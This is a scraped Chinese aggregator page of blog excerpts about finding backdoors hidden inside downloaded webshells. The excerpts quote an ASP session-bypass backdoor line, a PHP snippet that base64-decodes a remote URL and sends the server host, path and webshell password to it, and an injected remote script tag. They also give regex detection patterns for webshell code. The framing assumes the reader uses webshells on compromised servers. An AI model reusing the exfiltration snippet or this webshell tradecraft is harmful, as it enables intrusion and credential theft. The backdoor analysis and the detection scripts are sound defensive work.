精华内容
下载资源
问答
  • webshell后门分析 什么是WebShell 顾名思义,“web”的含义是需要服务器开放web服务;“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度...

    webshell后门分析

    什么是WebShell

    顾名思义,“web”的含义是需要服务器开放web服务;“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

    很多时候我们下载很多别人的webshell,我们要去判断这个webshell有没有后门,有的开发者通过后门让使用者中病毒,同时令目标网站有后门,从而获取我们的资源

    (其实很多广告就是一种后门)

    php,asp,jsp等都可以用记事本打开
    首先先把密码改了

    大马后门分析

    1、解密脚本代码

    通过查找代码非法登录几个关键字,发现这段代码是经过加密的,于是把函数execute改为msgbox这个函数, 进行解密明文输出

    之后将文件格式改为VBS脚本执行

    2、分析后门代码

     if request("%")="%" then
     Session("web2a2dmin") = UserPass
           URL()
      end if
    	
    

    3、编写后门利用工具

    中国菜刀一句话后门分析

    菜刀与大马不同 ,才用的CS框架,看不见源代码
    因此通过协议来看有没有后门

    打开WSockExpert软件,也可以选择其它抓包软件,选择需要监听的“中国菜刀”程序进程,双击
    这个抓包软件可以针对windows下的进程进行抓包
    在包中可以看见文件名
    有一个包有一段代码开头为 密码=
    采用base64解密代码
    (有可能有的时候两层)
    解码之后发现这段代码是把使用者主机名(菜刀链接地址)+URL+密码 发送给了开发者

    其它脚本后门分析

    我们可以通过通信解决有没有后门
    最后在登录状态下
    密码框 查看元素 网络
    之后点击登录
    仔细观察文件那里
    点开之后可以看到也是把我们访问的文件发送给开发者了

    展开全文
  • 简单去 webshell 后门方法 0x00 前言 因为我的电脑重装系统之后里面的文件都没有了,所以我近期经常会在网上收集工具,木马,并进行测试,但是令我惊讶的是,基本上在网上找到的马都有后门存在,想必各位都不想自己...

    简单去 webshell 后门方法

    0x00 前言
    因为我的电脑重装系统之后里面的文件都没有了,所以我近期经常会在网上收集工具,木马,并进行测试,但是令我惊讶的是,基本上在网上找到的马都有后门存在,想必各位都不想自己的劳动成果被别人拿走吧。所以我这篇文章就会教大家简单的去后门。

    0X01 环境及工具
    本次使用到的环境以及工具有:

    某 QQ 群随便下的木马

    宝塔面板自带文件编辑

    nginx/1.14.0 QQ 浏览器

    这是本次所使用的大马的登录界面
    在这里插入图片描述
    这是大马的功能页 一个不错的大马(可惜,有后门。)
    在这里插入图片描述

    大马的 源 代 码

    在这里插入图片描述
    0x02 过程
    从源代码中可以知道,这个木马是经过 gzp 及 base64 加密的程序,这种加密的程序我们只需要把 eval 改为 echo 即可解密。
    但是我们先不急解密大马的内容,我们先查看一下木马的代码末尾是否有“小学生”后期添加的后门,可以看见 这个木马的末尾有一句 :<script src=http://t.cn/R6YD1Qv></script>在这里插入图片描述
    非常明显的 xss 语句,我们先删除该语句。再对木马进行解密。
    解密之后直接访问木马程序的话里面的 html 还是会生效的,使用我们要 使用浏览器的查看源代码功能。
    使用查看源代码前:在这里插入图片描述
    使用查看源代码后:
    在这里插入图片描述
    这个时候我们就可以查看解密之后的木马源代码了。

    那么如何查看木马是否有后门并去掉呢?
    一般情况下,后门的地址是会加密的,但是我们可以通过搜索aHR,base64,password来找后门, 那么这个程序我是通过搜索 base64 发现的后门:

    if(isset($_GET['login'])=='geturl'){@set_time_limit(10);$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];$serverp = envlpass;$copyurl = base64_decode('aHR0cDovLyU3MSU3OSU3NiU2MyUyZSU2MyU2ZiU2ZC8lNzAlNjglNzAvP3U9');$url=$copyurl.$serveru.'&p='.$serverp;$url=urldecode($url);GetHtml($url);
    

    在这里插入图片描述
    在发现后门之后我们把 base64 编码后的内容解密一下:
    在这里插入图片描述
    访问解密的内容后发现,这个地址已经报 404 了,但是为了安全起见,我们还是把 base64 的编码去掉。
    在这里插入图片描述
    0x03 完
    在感叹世道如此的时候也不得不问一下,究竟是人性的扭曲还是道德的沦陷,致使现在连用个木马都不安心,还得去后门才能安心使用?

    仅提供 想法和思路请勿乱来感谢各位!!!

    展开全文
  • 搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了。这个代码比较简单,大家可以继续完善下。#!/usr/bin/python# -*- coding: utf-8 -*-#blog:...

    后门这东西好让人蛋疼,第一文件太多了,不容易找,第二,难找,需要特征匹配啊。搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了。

    这个代码比较简单,大家可以继续完善下。

    #!/usr/bin/python

    # -*- coding: utf-8 -*-

    #blog:www.jincon.com

    import os

    import sys

    import re

    rulelist = [

    '(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))',

    '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',

    'eval\(base64_decode\(',

    '(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',

    '(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',

    '(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',

    '(wscript\.shell)',

    '(gethostbyname\()',

    '(cmd\.exe)',

    '(shell\.application)',

    '(documents\s+and\s+settings)',

    '(system32)',

    '(serv-u)',

    '(提权)',

    '(phpspy)',

    '(后门)',

    '(webshell)',

    '(Program\s+Files)'

    ]

    def Scan(path):

    for root,dirs,files in os.walk(path):

    for filespath in files:

    isover = False

    if '.' in filespath:

    ext = filespath[(filespath.rindex('.')+1):]

    if ext=='php':

    file= open(os.path.join(root,filespath))

    filestr = file.read()

    file.close()

    for rule in rulelist:

    result = re.compile(rule).findall(filestr)

    if result:

    print '文件:'+os.path.join(root,filespath)

    print '恶意代码:'+str(result[0])

    print '\n\n'

    break

    if os.path.lexists(sys.argv[1]):

    print('\n\n开始扫描:'+sys.argv[1])

    print(' 可疑文件 ')

    print('########################################')

    Scan(sys.argv[1])

    print('提示:扫描完成-- O(∩_∩)O哈哈~')

    else:

    print '提示:指定的扫描目录不存在--- 我靠( \'o′)!!凸'

    展开全文
  • webshell后门分析

    2021-03-13 14:52:43
    别再让我遇到,不会有结果又很喜欢的人。。。 ​---- 网易云热评 一、访问上传的木马文件 ...四、查看木马源文件,然后搜索该网址,随便修改为一个无效地址,该木马...注意:抓包的时候,有的后门不是一登录就发送的...

    别再让我遇到,不会有结果又很喜欢的人。。。

    ​----  网易云热评

    一、访问上传的木马文件

    http://192.168.1.104/1.asp

     

    二、点击F12,打开谷歌自带的开发人员工具,点击network

     

    三、输入密码,看看抓包情况,该木马会自动向某网站上传木马路径和密码

     

    四、查看木马源文件,然后搜索该网址,随便修改为一个无效地址,该木马用的是反转加密,所以我们搜索不到,有时候是其他加密,需要解密才可以修改

     

    注意:抓包的时候,有的后门不是一登录就发送的,也有可能停一段时间才发送,甚至当你退出的时候才发送

     

    禁止非法,后果自负

    欢迎关注公众号:web安全工具库

    欢迎关注视频号:之乎者也吧

     

    展开全文
  • dedecms之webshell后门分析单位某站用的dedecms,今天被某黑阔getshell了,无奈只能打包代码进行分析,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:{dede:php}file_put_contents(’90...
  • 但是一些人会在webshell中插入小小的一段代码,这样你辛苦拿下的webshell的地址和密码等等就会统统发送给在webshell后门的人。这段代码可大可小,下面是我随便找的一个phpwebshell,来解密一下其中的后门。首先是...
  • 收集一些常见的webshell后门的特征码

    千次阅读 2016-03-21 11:05:07
    收集一些常见的webshell后门的特征码2010-02-26 21:17 3571人阅读 评论(0) 收藏 举报vbscriptcmdsystem正则表达式phpasp一些常见的webshell(asp,aspx,php,jsp等)后门木马。什么是一句话木马?不了解的朋友百度...
  • webshell后门检测原理

    千次阅读 2019-04-30 20:20:53
    一、什么是webshell shell (计算机壳层) 在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后...
  • webshell后门上传流程

    2017-07-08 18:16:13
    1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行...3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站U...
  • 那么多代码里不可能我们一点点去找后门,另外,即使最好的Webshell查杀软件也不可能完全检测出来所有的后门,这个时候我们可以通过检测文件的完整性来寻找代码中隐藏的后门。 文件MD5校验 绝大部分软件,我们下载时...
  • 使用说明:1....按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = [‘(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0...
  • /**********************php扫描后门**********************/error_reporting(E_ERROR);ini_set(’max_execution_time’,20000);ini_set(’memory_limit’,’512M’);header("content-Type: text/html; charset=gb...
  • 使用说明:1....按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0...
  • Linux下Python版webshell后门查杀工具

    千次阅读 2018-04-25 08:59:13
    查杀指定路径:python webshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″python实现代码:# -*- coding: utf-8 -*- import os import sys import re import time rulelist = ...
  • 并处理判断返回结果,使在线查杀文件不在是梦想~ ...缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合...
  • 使用说明:1....按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0...
  • 即使是一款拥有99.9%的Webshell检出率的检测引擎,依然可能存在Webshell绕过的情况。另外,像暗链、网页劫持、页面跳转等常见的黑帽SEO手法,也很难通过手动检测或工具检测全部识别出来。 最好的方式就是做文件完整...
  • 使用说明:1....按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0...
  • 服务器被搞的不能行,因为特殊原因必须去市场上购买模板,所以避免不了被留下了后门。 研究了很久的后门,发现都是通过eval函数引起的,eval其实并不是一个函数,而是底层提供第一种特性。 看了百度很多文章,都是...
  • CTF writeup:tomcat上传webshell后门

    千次阅读 2017-07-01 19:14:07
    做了ZJU school-bus的一个题目,给了链接,***:**,在IP加端口...后面进去了网站要往上传个后门,找了好多地方没找到后门,自己写暂时水平不够,后来终于找到了一个。 https://scoperchiatore.wordpress.com/my-webshe
  • linux下隐藏webshell后门

    2013-12-28 16:49:00
    第一种:本地包含漏洞 你们...传说中的 查不出 删不掉的webshell后门实现了....即使管理删掉你的1.php你依然能访问 淫荡吧! 第三种:当然就是 r00tkit了 转载于:https://www.cnblogs.com/mujj/articles/3495491.html
  • 得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,1.下面教一种很菜的方法,ASP插入法,不容易被发现~在我们要做手脚的ASP文件里加入...
  • 一 建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R &gt; test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;...
  • 1.查杀指定路径:python webshell.py 路径 2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″ # -*- coding: utf-8 -*- import osimport sysimport reimport time rulelist = [ '(\$_(GET|...
  • 一句话查找PHP木马 # find ./ -name “*.php” |xargs egrep “phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|...’ ....http://www.androidstar.cn/linux系统下查找webshell后门的强大命令/
  • 服务器被挂马或被黑的朋友应该知道,黑客入侵web服务器的第一目标是往服务器上上传一个webshell,有了webshell黑客就可以干更多的事情。网站被挂马后很多人会束手无策,无从查起,其实并不复杂,这里我将以php环境为...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 773
精华内容 309
关键字:

webshell后门